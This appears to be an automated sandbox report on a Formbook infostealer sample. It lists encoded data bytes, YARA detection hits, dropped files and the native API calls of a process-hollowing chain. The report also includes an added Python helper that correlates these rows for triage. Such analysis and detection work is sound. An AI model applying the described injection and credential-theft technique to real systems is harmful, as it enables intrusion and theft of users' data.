67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 73 50 57 4f 49 4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA).
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\ipconfig.exe | Dropped file: C:\Users\user\AppData\Roaming\9M55PA10\9M5logri.ini
Source: C:\Windows\SysWOW64\ipconfig.exe | Dropped file: C:\Users\user\AppData\Roaming\9M55PA10\9M5logrv.ini
Malicious sample detected (through community Yara rule)
Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419C90 NtCreateFile
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419D40 NtReadFile
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419DC0 NtClose
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419E70 NtAllocateVirtualMemory
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419C8A NtCreateFile
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419D3A NtReadFile
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419DBA NtClose
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419E6A NtAllocateVirtualMemory
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9A20 NtResumeThread,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A98F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A97A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9540 NtReadFile,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A95D0 NtClose,LdrInitializeThunk
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9B00 NtSetValueKey
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031AA3B0 NtGetContextThread
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9A10 NtQuerySection
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9A80 NtOpenDirectoryObject
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9950 NtQueueApcThread
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A99D0 NtCreateProcessEx
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9820 NtEnumerateKey
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031AB040 NtSuspendThread
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A98A0 NtWriteVirtualMemory
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031AA710 NtOpenProcessToken
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9730 NtQueryVirtualMemory
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9770 NtSetInformationFile
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031AA770 NtOpenThread
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9760 NtOpenProcess
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9FE0 NtCreateMutant
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9610 NtEnumerateValueKey
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9650 NtQueryValueKey
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9670 NtQueryInformationProcess
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A96D0 NtCreateKey
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031AAD30 NtSetContextThread
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9520 NtWaitForSingleObject
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9560 NtWriteFile
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A95F0 NtQueryInformationFile
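The Yara match rows above and the `Code function:` rows for ieinstal.exe are the two pieces of evidence an analyst correlates by hand: which process index holds the Formbook payload in executable memory, and whether that same process resolves the native calls that make up the process-hollowing chain (NtCreateProcessEx, NtUnmapViewOfSection, NtMapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread). The following Python is an added triage example, not code from Joe Sandbox or from this report. It assumes (inferred from the page, not documented on it) that a memory dump id reads `<proc>.<stage>.<uid>.<base>.<protect>.<type>.sdmp` with hex fields, that `<proc>` is the same process index used in the `N.2.<image>` unpack names (00000009 matches 9.2.ieinstal.exe, 0000001D matches 29.2.ieinstal.exe), and that `<protect>` is the Win32 PAGE_* constant of the region (0x40 is PAGE_EXECUTE_READWRITE). The sample rows are copied from this report.

```python
"""Added triage helper for sandbox signature rows; not part of the report."""
import re
from collections import defaultdict

# Win32 memory protection constants (assumed meaning of the <protect> field)
PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

# Native calls that together form the hollowing / thread-hijack chain:
# create suspended, unmap, map, write, set thread context, resume.
HOLLOWING_APIS = {
    "NtCreateProcessEx", "NtUnmapViewOfSection", "NtMapViewOfSection",
    "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread",
}

# Assumed dump-id layout: <proc>.<stage>.<uid>.<base>.<protect>.<type>.sdmp
DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<typ>[0-9A-Fa-f]{8})\.sdmp"
)
# '<proc>_<stage>_<addr> Api1,Api2'; the flattened export may glue the id on again
CODEFN_RE = re.compile(
    r"Code function:\s*(?P<proc>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]{8})"
    r"\s*(?P<apis>[A-Za-z0-9_,]*)"
)
FUNC_ID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")


def parse_dump_id(text):
    """Decode the first memory dump id found in text, or return None."""
    m = DUMP_RE.search(text)
    if not m:
        return None
    prot = int(m.group("prot"), 16)
    return {
        "process_index": int(m.group("proc"), 16),
        "stage": int(m.group("stage"), 16),
        "base": int(m.group("base"), 16),
        "protect": PAGE_PROTECT.get(prot, hex(prot)),
        "executable": bool(prot & 0xF0),  # PAGE_EXECUTE* constants are 0x10..0x80
    }


def parse_code_function(line):
    """Return (process_index, address, [apis]) for a 'Code function:' row, else None.

    The repeated function id appended by the flattened export is dropped, so
    '9_2_00419C90 NtCreateFile,9_2_00419C90' yields ['NtCreateFile'].
    """
    m = CODEFN_RE.search(line)
    if not m:
        return None
    apis = [t for t in m.group("apis").split(",") if t and not FUNC_ID_RE.match(t)]
    return int(m.group("proc")), int(m.group("addr"), 16), apis


def triage(rows):
    """Per process index: count RWX dumps with Yara hits and check the API chain."""
    procs = defaultdict(lambda: {"yara_dumps": [], "apis": set()})
    for row in rows:
        if "Yara match" in row or "Matched rule" in row:
            d = parse_dump_id(row)
            if d:
                procs[d["process_index"]]["yara_dumps"].append(d)
        cf = parse_code_function(row)
        if cf:
            proc, _addr, apis = cf
            procs[proc]["apis"].update(apis)
    result = {}
    for proc, info in procs.items():
        seen = HOLLOWING_APIS & info["apis"]
        result[proc] = {
            "rwx_yara_hits": sum(1 for d in info["yara_dumps"]
                                 if d["protect"] == "PAGE_EXECUTE_READWRITE"),
            "hollowing_apis": sorted(seen),
            "hollowing_chain_complete": seen == HOLLOWING_APIS,
        }
    return result


# Rows copied from this report: four Yara hits and a subset of the ieinstal.exe functions.
SAMPLE_ROWS = [
    "Source: Yara match | File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match | File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe | Code function: 9_2_00419C90 NtCreateFile,9_2_00419C90",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe | Code function: 9_2_031A9A20 NtResumeThread,LdrInitializeThunk",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe | Code function: 9_2_031A9780 NtMapViewOfSection,LdrInitializeThunk",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe | Code function: 9_2_031A97A0 NtUnmapViewOfSection,LdrInitializeThunk",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe | Code function: 9_2_031A99D0 NtCreateProcessEx,9_2_031A99D0",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe | Code function: 9_2_031A98A0 NtWriteVirtualMemory,9_2_031A98A0",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe | Code function: 9_2_031AAD30 NtSetContextThread,9_2_031AAD30",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe | Code function: 9_2_004010309_2_00401030",
]

if __name__ == "__main__":
    for proc, info in sorted(triage(SAMPLE_ROWS).items()):
        print(proc, info)
```

On the rows above, process index 9 (ieinstal.exe) ends up with two RWX regions carrying Formbook hits and the complete hollowing chain, while process 25 holds a hit only in a PAGE_READWRITE region and resolves none of the chain. The `LdrInitializeThunk` suffix on the resolved Nt* calls is kept as an ordinary API token; it reflects how the sandbox labelled the call site and is not part of the chain check.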
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00401030
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041D97B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DADA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DBC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00402D90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DDA4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041E654
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DE0B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00409E2E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00409E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041CEE3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041CEE6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DEFF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0041DF1F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00402FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0319EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0316F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03184120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03221002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0317B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031920A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03186E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03160D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03231D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_03192581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0317D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_0317841F
Source: C:\Users\user\AppData\Local\Mqbmnet.exe | Code function: 19_3_04B26EB0
Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 50484224 appears 50 times
Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe | Code function: String function: 0231C890 appears 48 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 0316B150 appears 32 times
Source: C:\Users\user\AppData\Local\Mqbmnet.exe | Code function: String function: 04B2B4A4 appears 32 times
Source: C:\Users\user\AppData\Local\Mqbmnet.exe | Code function: String function: 04B23AF4 appears 40 times
Source: Mqbmupv_Signed_.exe | Static PE information: invalid certificate
Source: Mqbmupv_Signed_.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Mqbmupv_Signed_.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Mqbmnet.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Mqbmnet.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Mqbmupv_Signed_.exe, 00000000.00000000.204808352.0000000000465000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameYes( vs Mqbmupv_Signed_.exe
Source: 00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
